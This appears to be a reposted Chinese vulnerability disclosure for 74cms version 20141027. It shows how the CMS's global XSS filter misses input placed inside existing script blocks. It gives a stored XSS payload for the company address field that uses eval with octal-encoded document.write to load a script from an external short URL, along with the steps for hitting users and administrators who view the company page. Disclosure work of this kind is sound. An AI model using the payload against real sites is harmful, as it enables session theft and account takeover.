74cms(20141027)全局xss防护考虑不完善可被绕过

没穿底裤 2020年1月1日05:07:07评论359 views字数 642阅读2分8秒阅读模式
摘要

防护代码就不贴出来了,代码中只考虑了 新建标签的情况 或者在a img之类的标签节点中。


漏洞作者: 路人甲

防护代码就不贴出来了,

代码中只考虑了 新建标签的情况 或者在a img之类的标签节点中。

但是没有考虑下面这种的情况

<script> Var xx=”qiyeid”; </script>

这样的话,我们就可以这样利用

<script> Var xx=”qiyeid”;eval(‘documnet.write(js 8进制编码)’)// </script>

漏洞证明:

正好找到了一处存储xss。

直接贴利用方法

先来注册一个企业帐号

74cms(20141027)全局xss防护考虑不完善可被绕过

 

http://localhost/74/user/company/company_info.php?act=company_profile

重点利用在详细地址这,不过我们需要设置一下input的长度大一点 。默认长度为80,但是数据库中为250。

然后插上我们的代码。

",opts);eval('document.write("/74/163cript//163rc=//t.cn/*****/76/74//163cript/76")')//

74cms(20141027)全局xss防护考虑不完善可被绕过

保存

然后再去地图标注一下企业的位置,

http://localhost/74/user/company/company_info.php?act=company_map_set

74cms(20141027)全局xss防护考虑不完善可被绕过

这个位置就随意了。

然后等用户查看企业时 或者管理员在后台审核企业时

74cms(20141027)全局xss防护考虑不完善可被绕过

 

会打开如下url http://localhost/74/company/company-show.php?id=1(前台也可见,为企业的展示页面)

74cms(20141027)全局xss防护考虑不完善可被绕过

修复方案:

把在script中的情况也考虑下。

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2020年1月1日05:07:07
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   74cms(20141027)全局xss防护考虑不完善可被绕过https://cn-sec.com/archives/76021.html

发表评论

匿名网友 填写信息